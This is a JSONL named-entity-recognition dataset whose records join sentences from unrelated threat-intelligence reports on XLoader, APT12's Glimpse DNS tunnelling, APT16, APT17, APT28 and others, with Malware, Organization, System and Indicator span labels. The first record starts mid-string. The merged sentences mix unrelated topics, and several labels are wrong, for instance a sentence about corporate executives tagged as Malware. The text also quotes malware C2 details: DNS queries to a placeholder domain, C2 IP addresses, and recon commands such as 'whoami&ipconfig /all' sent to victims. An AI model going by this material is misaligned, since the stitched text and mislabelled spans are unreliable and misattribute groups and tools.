The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": [{"start": 53, "end": 56, "label": "System"}, {"start": 134, "end": 138, "label": "Organization"}, {"start": 156, "end": 177, "label": "Organization"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 279, "end": 289, "label": "System"}, {"start": 296, "end": 304, "label": "Malware"}, {"start": 373, "end": 382, "label": "System"}]} {"text": "If the user installs the profile , the malicious website will open , revealing it to be an Apple phishing site , as seen in figure 2 . APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals . In ping mode, Glimpse uses a .NET . Figure 8 : Scilc.exe usage example", "spans": [{"start": 91, "end": 96, "label": "Organization"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 237, "end": 244, "label": "Malware"}, {"start": 250, "end": 256, "label": "Indicator"}, {"start": 270, "end": 279, "label": "System"}]} {"text": "Technical analysis Most of this new attack \u2019 s routines are similar to those of the previous XLoader versions . Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE . The table below describes the operational mode, record types used, and the method used to send the . 
According to a recent V3.co.uk article , 95 percent of companies have already fallen victim to attacks from advanced malware and suffer from an average of 643 successful infections per week .", "spans": [{"start": 93, "end": 100, "label": "Malware"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 155, "end": 162, "label": "Organization"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 219, "end": 227, "label": "System"}, {"start": 353, "end": 361, "label": "Organization"}, {"start": 386, "end": 395, "label": "Organization"}, {"start": 448, "end": 455, "label": "Malware"}]} {"text": "However , as mentioned earlier , an analysis of this new variant showed some changes in its code in line with its new deployment method . However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 . The first DNS query by Glimpse requests the mode to be used in future communications with the controller (i.e., ping mode or text ) . The Twitter handle used by Hack520 indicates also an \u201c est \u201d portion .", "spans": [{"start": 191, "end": 198, "label": "System"}, {"start": 203, "end": 220, "label": "System"}, {"start": 248, "end": 253, "label": "Organization"}, {"start": 266, "end": 269, "label": "Indicator"}, {"start": 279, "end": 286, "label": "Malware"}, {"start": 417, "end": 424, "label": "Organization"}]} {"text": "We discuss these changes and its effect on Android and Apple devices . From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server . Prior to making any query, a function called AdrGen is used to build a query . 
Although we can not verify that the service disruptions occurred directly as a result of KillNet operations , the data below illustrates claims that overlap temporally with verified service disruptions .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 55, "end": 60, "label": "System"}, {"start": 103, "end": 110, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 136, "end": 143, "label": "System"}, {"start": 168, "end": 172, "label": "System"}, {"start": 393, "end": 400, "label": "Organization"}]} {"text": "Malicious APK Like its previous versions , XLoader 6.0 abuses social media user profiles to hide its real C & C addresses , but this time its threat actors chose the social media platform Twitter , which was never used in previous attacks . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . This function takes several parameters, most of which are represented in the subdomain label(s) of the query . In addition , Hack520 \u2019s tweets always show photos of the same animal , which is likely his pet pig .", "spans": [{"start": 43, "end": 54, "label": "Malware"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 306, "end": 314, "label": "System"}, {"start": 323, "end": 337, "label": "System"}, {"start": 340, "end": 344, "label": "System"}, {"start": 370, "end": 383, "label": "Vulnerability"}, {"start": 511, "end": 598, "label": "Indicator"}]} {"text": "The real C & C address is encoded in the Twitter names , and can only be revealed once decoded . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . Below is a list of AdrGen . 
Mandiant used these signatures to search the XPdb for additional attacker payloads that were deleted by the threat actor or otherwise unable to be identified through other forms of analysis .", "spans": [{"start": 41, "end": 48, "label": "Organization"}, {"start": 97, "end": 104, "label": "Organization"}, {"start": 130, "end": 137, "label": "System"}, {"start": 141, "end": 149, "label": "System"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 364, "end": 381, "label": "Malware"}]} {"text": "This adds an extra layer against detection . They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . As mentioned above, one of the parameters passed to the AdrGen function is the action . The attacks used a multistage infection chain initiated with malicious Microsoft Office documents , most commonly using Microsoft Excel and PowerPoint file formats .", "spans": [{"start": 98, "end": 135, "label": "Organization"}, {"start": 154, "end": 177, "label": "System"}, {"start": 186, "end": 196, "label": "System"}, {"start": 212, "end": 232, "label": "System"}, {"start": 384, "end": 420, "label": "System"}, {"start": 443, "end": 458, "label": "System"}, {"start": 463, "end": 486, "label": "System"}]} {"text": "The code for this characteristic and the corresponding Twitter accounts can be seen in figures 3 and 4 respectively . A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity . Table 5: Glimpse action parameters values for the AdrGen function below contains the possible parameters, a brief description, and return values applicable to the action . 
Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 55, "end": 62, "label": "Organization"}, {"start": 132, "end": 150, "label": "Organization"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 214, "end": 220, "label": "Organization"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 324, "end": 331, "label": "Malware"}]} {"text": "Version 6.0 also adds a command called \u201c getPhoneState \u201d , which collects unique identifiers of mobile devices such as IMSI , ICCID , Android ID , and device serial number . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . The query to set the receive mode expects an A resource record response from the . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": [{"start": 134, "end": 141, "label": "System"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 212, "end": 246, "label": "Organization"}, {"start": 335, "end": 344, "label": "Organization"}]} {"text": "This addition is seen in Figure 5 . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . The controller will respond with one of two responses: 99.250.250.199 will set the receive mode to . 
Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": [{"start": 60, "end": 78, "label": "Organization"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 183, "end": 202, "label": "System"}, {"start": 207, "end": 243, "label": "System"}, {"start": 301, "end": 315, "label": "Indicator"}, {"start": 468, "end": 476, "label": "Organization"}, {"start": 479, "end": 484, "label": "Organization"}, {"start": 487, "end": 494, "label": "Organization"}]} {"text": "Considering the other malicious behaviors of XLoader , this added operation could be very dangerous as threat actors can use it to perform targeted attacks . With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . Any other IP address will set the receive mode to ping, although the server-side software suggests 199.250.250.99 will be . 
RDP and phishing are two of the most popular initial ransomware attack vectors , and cybercriminals approach in leveraging these techniques has not changed much over the years .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 267, "end": 281, "label": "Organization"}, {"start": 284, "end": 298, "label": "Organization"}, {"start": 385, "end": 392, "label": "Organization"}, {"start": 395, "end": 401, "label": "Organization"}, {"start": 404, "end": 411, "label": "Organization"}, {"start": 414, "end": 420, "label": "Organization"}, {"start": 528, "end": 542, "label": "Indicator"}, {"start": 638, "end": 652, "label": "Organization"}]} {"text": "Malicious iOS profile In the case of Apple devices , the downloaded malicious iOS profile gathers the following : Unique device identifier ( UDID ) International Mobile Equipment Identity ( IMEI ) Integrated Circuit Card ID ( ICCID ) Mobile equipment identifier ( MEID ) Version number Product number The profile installations differ depending on the iOS . Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . When set in text receive mode, the malware uses the AdrGen function to create another query string with the r (receiver) flag and a W (wait) action . At Talos , we pride ourselves on the quality of the intelligence we publish .", "spans": [{"start": 10, "end": 13, "label": "System"}, {"start": 37, "end": 42, "label": "System"}, {"start": 78, "end": 81, "label": "System"}, {"start": 351, "end": 354, "label": "System"}, {"start": 357, "end": 371, "label": "Organization"}, {"start": 458, "end": 465, "label": "Organization"}, {"start": 468, "end": 474, "label": "Organization"}, {"start": 477, "end": 484, "label": "Organization"}, {"start": 487, "end": 493, "label": "Organization"}, {"start": 655, "end": 660, "label": "Organization"}]} {"text": "For versions 11.0 and 11.4 , the installation is straightforward . 
The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits \u2014 and a retooling of what security researchers believe is a massive spying operation based in China . The expected TXT record response has the following structure: . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": [{"start": 131, "end": 136, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 418, "end": 430, "label": "Organization"}, {"start": 435, "end": 447, "label": "Organization"}, {"start": 487, "end": 499, "label": "Malware"}]} {"text": "If a user visits the profile host website and allows the installer to download , the iOS system will go directly to the \u201c Install Profile \u201d page ( which shows a verified safety certificate ) , and then request the users \u2019 passcode for the last step of installation . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries . In our sample traffic, the TXT resource record returned contained: . 
The constant integers are obfuscated using structures and loops to get the right offset .", "spans": [{"start": 85, "end": 88, "label": "System"}, {"start": 352, "end": 357, "label": "Organization"}, {"start": 432, "end": 441, "label": "Organization"}, {"start": 444, "end": 463, "label": "Organization"}, {"start": 466, "end": 471, "label": "Organization"}, {"start": 476, "end": 505, "label": "Organization"}, {"start": 577, "end": 666, "label": "Malware"}]} {"text": "On later versions , specifically iOS 12.1.1 and iOS 12.2 , the process is different . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This response tells the malware to set a variable for the file name to receivebox\\rcvd10100 and set the next query action to D in order to request the next chunk of . The site also claimed to include the names , addresses and phone numbers of top CEOs .", "spans": [{"start": 33, "end": 43, "label": "System"}, {"start": 48, "end": 56, "label": "System"}, {"start": 171, "end": 181, "label": "Organization"}, {"start": 276, "end": 285, "label": "Organization"}, {"start": 288, "end": 307, "label": "Organization"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 320, "end": 349, "label": "Organization"}, {"start": 423, "end": 443, "label": "Indicator"}, {"start": 519, "end": 603, "label": "Organization"}]} {"text": "After the profile is downloaded , the iOS system will first ask users to review the profile in their settings if they want to install it . On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . The malware sends another TXT query with the receiver . 
The new year is almost upon us , and 2022 has been a game of ransomware hardball .", "spans": [{"start": 38, "end": 41, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 286, "end": 305, "label": "Organization"}]} {"text": "Users can see a \u201c Profile Downloaded \u201d added in their settings ( this feature is in iOS 12.2 , but not on iOS 12.1.1 ) . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . This query is depicted below: 39e9D60005eca60000BCC64T.sample-domain.evil In the case of our sample traffic, the server responded with the following TXT resource record data: . Although KillMilk claims the activity was by their own group , the previous operations of Universal Dark Service targeted the Russian government and were critical of its actions .", "spans": [{"start": 84, "end": 92, "label": "System"}, {"start": 106, "end": 116, "label": "System"}, {"start": 169, "end": 178, "label": "Organization"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 272, "end": 291, "label": "Organization"}, {"start": 324, "end": 367, "label": "Indicator"}, {"start": 480, "end": 488, "label": "Organization"}, {"start": 561, "end": 583, "label": "Organization"}, {"start": 593, "end": 615, "label": "Organization"}]} {"text": "This gives users a chance to see details and better understand any changes made . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 . The controller provided the malware with base64-encoded data to be . 
Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": [{"start": 231, "end": 240, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 345, "end": 362, "label": "Organization"}, {"start": 398, "end": 406, "label": "Organization"}, {"start": 411, "end": 425, "label": "Organization"}]} {"text": "After the review , the process is the same as above . APT16 actors sent spear phishing emails to two Taiwanese media organizations . The data will eventually be written to disk and the malware sets the next query action to D in order to request the next chunk of . \u201c It appears to be the email address Will used for his profiles , \u201d the IT director replied .", "spans": [{"start": 54, "end": 66, "label": "Organization"}, {"start": 111, "end": 130, "label": "Organization"}, {"start": 302, "end": 306, "label": "Organization"}, {"start": 337, "end": 348, "label": "Organization"}]} {"text": "After the profile is installed , the user will then be redirected to another Apple phishing site . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . The decoded data shows a command to be executed whoami&ipconfig /all on the victim . 
SysUpdate is exclusively used by Budworm .", "spans": [{"start": 77, "end": 82, "label": "Organization"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 172, "end": 182, "label": "Organization"}, {"start": 209, "end": 226, "label": "Organization"}, {"start": 454, "end": 463, "label": "Malware"}, {"start": 487, "end": 494, "label": "Organization"}]} {"text": "The phishing site uses the gathered information as its GET parameter , allowing the attacker to access the stolen information . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . The malware sends another TXT query with the receiver structure, as depicted . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 221, "end": 238, "label": "Organization"}, {"start": 321, "end": 335, "label": "System"}, {"start": 417, "end": 426, "label": "Organization"}]} {"text": "Ongoing activity While monitoring this particular threat , we found another XLoader variant posing as a pornography app aimed at South Korean users . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 . Note the request number parameter is now 0001: 39e965e000caD60001679C79T.sample-domain.evil . 
The ransomware is a 64bit executable written in Rust and it recognises the following commandline parameters", "spans": [{"start": 76, "end": 83, "label": "Malware"}, {"start": 228, "end": 247, "label": "Organization"}, {"start": 291, "end": 296, "label": "Organization"}, {"start": 346, "end": 390, "label": "Indicator"}, {"start": 397, "end": 407, "label": "Malware"}, {"start": 413, "end": 429, "label": "Malware"}, {"start": 441, "end": 445, "label": "System"}]} {"text": "The \" porn kr sex '' APK connects to a malicious website that runs XLoader in the background . The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility . The TXT record returned contained data: E0000>0 . Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware \u2019s behavior .", "spans": [{"start": 67, "end": 74, "label": "Malware"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 142, "end": 159, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 299, "end": 321, "label": "Malware"}]} {"text": "The website uses a different fixed twitter account ( https : //twitter.com/fdgoer343 ) . APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" . The controller issued the command to write the base64-decoded and modified data to the file name set earlier in the exchange . 
Talos eventually uncovered additional campaigns , including the two previously mentioned by Ukraine \u2019s Computer Emergency Response Team ( CERT - UA ) and FortiGuard Labs researchers .", "spans": [{"start": 35, "end": 42, "label": "Organization"}, {"start": 53, "end": 84, "label": "Indicator"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 144, "end": 163, "label": "System"}, {"start": 252, "end": 282, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}, {"start": 534, "end": 591, "label": "Organization"}, {"start": 596, "end": 623, "label": "Organization"}]} {"text": "This attack , however , seems exclusive to Android users , as it does not have the code to attack iOS devices . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . After the file is written, the malware moves on to process operations . 
There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 98, "end": 101, "label": "System"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 134, "end": 143, "label": "Organization"}, {"start": 163, "end": 175, "label": "Organization"}, {"start": 181, "end": 201, "label": "Organization"}, {"start": 258, "end": 277, "label": "Organization"}, {"start": 284, "end": 300, "label": "Organization"}, {"start": 303, "end": 312, "label": "Organization"}, {"start": 315, "end": 347, "label": "Organization"}, {"start": 350, "end": 366, "label": "Organization"}, {"start": 373, "end": 401, "label": "Organization"}, {"start": 518, "end": 526, "label": "Organization"}, {"start": 563, "end": 585, "label": "Organization"}, {"start": 633, "end": 647, "label": "Organization"}]} {"text": "Succeeding monitoring efforts revealed a newer variant that exploits the social media platforms Instagram and Tumblr instead of Twitter to hide its C & C address . FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines . Glimpse can be set to use ping mode in several ways while performing receive operations . An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to \u201c all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . 
\u201d", "spans": [{"start": 96, "end": 105, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 202, "end": 213, "label": "System"}, {"start": 365, "end": 372, "label": "Malware"}, {"start": 455, "end": 598, "label": "Malware"}]} {"text": "We labeled this new variant XLoader version 7.0 , because of the different deployment method and its use of the native code to load the payload and hide in Instagram and Tumblr profiles . The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight . If a query with the M action returns an IP address that is not 99.250.250.199 , the malware will use ping mode . In mid - June 2023 , KillNet announced that the collective and actors claiming to be from the Russian ransomware group REvil were collaborating in a joint operation targeting Western financial systems .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 170, "end": 176, "label": "Organization"}, {"start": 199, "end": 210, "label": "System"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 353, "end": 367, "label": "Indicator"}, {"start": 424, "end": 431, "label": "Organization"}, {"start": 497, "end": 521, "label": "Organization"}, {"start": 522, "end": 527, "label": "Organization"}, {"start": 578, "end": 603, "label": "Organization"}]} {"text": "These more recent developments indicate that XLoader is still evolving . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . 
It is worth noting that the IP response observed to set ping mode was the reverse of the IP used to set text mode (i.e., 199.250.250.99 ) . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 73, "end": 80, "label": "Organization"}, {"start": 120, "end": 146, "label": "Organization"}, {"start": 149, "end": 152, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 278, "end": 297, "label": "Organization"}, {"start": 300, "end": 310, "label": "Organization"}, {"start": 313, "end": 327, "label": "Organization"}, {"start": 334, "end": 352, "label": "Organization"}, {"start": 476, "end": 490, "label": "Indicator"}, {"start": 517, "end": 542, "label": "Organization"}, {"start": 568, "end": 572, "label": "Organization"}, {"start": 601, "end": 608, "label": "Organization"}]} {"text": "Adding connections to FakeSpy We have been seeing activity from XLoader since 2018 , and have since followed up our initial findings with a detailed research revealing a wealth of activity dating back to as early as January 2015 , which outlined a major discovery\u2014its connection to FakeSpy . The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . Ping mode will also be set if exceptions occur more than three times during text . 
It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 64, "end": 71, "label": "Malware"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 321, "end": 334, "label": "System"}]} {"text": "The emergence of XLoader 6.0 does not only indicate that the threat actors behind it remain active ; it also holds fresh evidence of its connection to FakeSpy . The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism . In the latter case, the P action is passed as one of the parameters to AdrGen and the query is made for an A resource record using the [System.Net.Dns]::GetHostAddresses . The campaigns contain malicious web links and attachments that infect users machines with malware when opened .", "spans": [{"start": 17, "end": 28, "label": "Malware"}, {"start": 151, "end": 158, "label": "Malware"}, {"start": 185, "end": 196, "label": "Organization"}, {"start": 213, "end": 239, "label": "System"}, {"start": 477, "end": 486, "label": "Organization"}]} {"text": "One such immediately apparent connection was the similar deployment technique used by both XLoader 6.0 and FakeSpy . These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) . If performing receive operations in ping mode, Glimpse makes a query with the 0 action to contact the controller for . 
Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": [{"start": 91, "end": 102, "label": "Malware"}, {"start": 107, "end": 114, "label": "Malware"}, {"start": 222, "end": 233, "label": "System"}, {"start": 247, "end": 260, "label": "System"}, {"start": 268, "end": 279, "label": "Organization"}, {"start": 404, "end": 411, "label": "Malware"}]} {"text": "It had again cloned a different legitimate Japanese website to host its malicious app , similar to what FakeSpy had also done before . APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . This query uses a receive structure similar to an M action; it is worth noting all of the receiver operation queries made in ping mode use the [System.Net.Dns]::GetHostAddresses . We assess \" pack\\scil\\s1.txt \" is likely a file containing SCIL commands the attackers executed in MicroSCADA .", "spans": [{"start": 104, "end": 111, "label": "Malware"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 166, "end": 186, "label": "Organization"}, {"start": 218, "end": 275, "label": "Organization"}, {"start": 507, "end": 606, "label": "Indicator"}]} {"text": "Their similarity is made more apparent by looking at their naming method for downloadable files , domain structure of fake websites and other details of their deployment techniques , exemplified in figure 10 . APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . In our sample, after the malware sent the 0 action, the controller responded with an A record containing 24.125.10.140 . 
Future cybercriminal campaigns on social network platforms may not be so gentle .", "spans": [{"start": 210, "end": 215, "label": "Organization"}, {"start": 241, "end": 261, "label": "Organization"}, {"start": 264, "end": 315, "label": "Organization"}, {"start": 337, "end": 354, "label": "Organization"}, {"start": 365, "end": 386, "label": "Organization"}, {"start": 387, "end": 405, "label": "Organization"}, {"start": 406, "end": 420, "label": "Organization"}, {"start": 567, "end": 580, "label": "Indicator"}, {"start": 590, "end": 613, "label": "Organization"}, {"start": 617, "end": 641, "label": "System"}]} {"text": "XLoader 6.0 also mirrors the way FakeSpy hides its real C & C server . FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors . This response tells the malware to: Set the file name for the data that will follow to 10140, Set the part number to 0, Parse response data, Set a 1 action for the next . 
Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 33, "end": 40, "label": "Malware"}, {"start": 71, "end": 81, "label": "Organization"}, {"start": 98, "end": 104, "label": "Organization"}, {"start": 108, "end": 114, "label": "Organization"}, {"start": 145, "end": 157, "label": "Organization"}, {"start": 270, "end": 279, "label": "Organization"}, {"start": 282, "end": 289, "label": "Organization"}, {"start": 292, "end": 298, "label": "Organization"}, {"start": 301, "end": 311, "label": "Organization"}, {"start": 316, "end": 329, "label": "Organization"}, {"start": 503, "end": 520, "label": "Organization"}, {"start": 569, "end": 579, "label": "System"}]} {"text": "When before it had used several different social media platforms , it now uses the Twitter platform , something FakeSpy has done in its past attacks . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment . Query: 00039e9650eca66C06T.sample-domain.evil , Response: 24.125.10.140 , File name: 10140, Query: 139e965e000ca6D2C80T.sample-domain.evil , Response: 110.101.116.0 , Query: 00339e965e1ca6EF4C07T.sample-domain.evil , Response: 32.117.115.3 , Query: 30069e 1965eca6FE8C13T.sample-domain.evil, Response: 101.114.32.6 , Query: 391 e960095eca63570BC62T.sample-domain.evil , Response: 1.2.3.0 . 
The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": [{"start": 83, "end": 90, "label": "Organization"}, {"start": 112, "end": 119, "label": "Malware"}, {"start": 151, "end": 164, "label": "System"}, {"start": 226, "end": 235, "label": "System"}, {"start": 295, "end": 333, "label": "Indicator"}, {"start": 346, "end": 359, "label": "Indicator"}, {"start": 387, "end": 426, "label": "Indicator"}, {"start": 439, "end": 452, "label": "Indicator"}, {"start": 462, "end": 502, "label": "Indicator"}, {"start": 515, "end": 527, "label": "Indicator"}, {"start": 590, "end": 602, "label": "Indicator"}, {"start": 612, "end": 655, "label": "Indicator"}, {"start": 668, "end": 675, "label": "Indicator"}, {"start": 709, "end": 716, "label": "Organization"}]} {"text": "Analysis of the malicious iOS profile also revealed further connections , as the profile can also be downloaded from a website that FakeSpy deployed early this year . However , three themes in APT28 's targeting clearly reflects areas of specific interest to an Eastern European government , most likely the Russian government . In this case, the content net user is written to . The core module has a lot of functionality that gives the attacker full control of the victim machine .", "spans": [{"start": 26, "end": 29, "label": "System"}, {"start": 132, "end": 139, "label": "Malware"}, {"start": 193, "end": 198, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 396, "end": 422, "label": "Malware"}, {"start": 438, "end": 446, "label": "Organization"}]} {"text": "Conclusion and security recommendations The continued monitoring of XLoader showed how its operators continuously changed its features , such as its attack vector deployment infrastructure and deployment techniques . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government . 
After writing the data to disk, receiver operations are complete and processor operations . Sandworm is a full - spectrum threat actor that has carried out espionage , influence and attack operations in support of Russia 's Main Intelligence Directorate ( GRU ) since at least 2009 .", "spans": [{"start": 68, "end": 75, "label": "Malware"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 448, "end": 456, "label": "Organization"}, {"start": 570, "end": 617, "label": "Organization"}]} {"text": "This newest entry seems to indicate that these changes won \u2019 t be stopping soon . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . After writing the data received from the controller, a function is called to process the received . The UK , on the other hand , emerged as the second - largest ransomware target , enduring close to 200 ransomware attacks .", "spans": [{"start": 229, "end": 242, "label": "Organization"}, {"start": 428, "end": 477, "label": "Indicator"}, {"start": 480, "end": 520, "label": "Indicator"}]} {"text": "Being aware of this fact can help create defensive strategies , as well as prepare for upcoming attacks . Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials . The processor function builds a list of files from the files with content that match rcvd* in the receivebox . 
Vice Society \u2019s targeting of education is undoubtedly deliberate and has likely allowed the gang to develop domain - specific techniques and expertise .", "spans": [{"start": 144, "end": 160, "label": "Organization"}, {"start": 362, "end": 377, "label": "Organization"}, {"start": 391, "end": 400, "label": "Organization"}]} {"text": "In addition , just as uncovering new characteristics is important , finding ones we \u2019 ve also seen in a different malware family like FakeSpy also provides valuable insight . APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor . Similar to PoisonFrog , the last digit of the received file name determines how the content of the file is . Imagine you got an email that looked like it was from a friend .", "spans": [{"start": 134, "end": 141, "label": "Malware"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 384, "end": 389, "label": "Organization"}, {"start": 414, "end": 424, "label": "Malware"}]} {"text": "Links between XLoader and FakeSpy can give clues to the much broader inner workings of the threat actors behind them . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions . In our sample traffic, after executing the commands sent via cmd.exe , Glimpse writes the output of the commands in the sendbox directory to the appropriate file names (e.g., 10100 or 10140) prepended with proc (e.g., ) . 
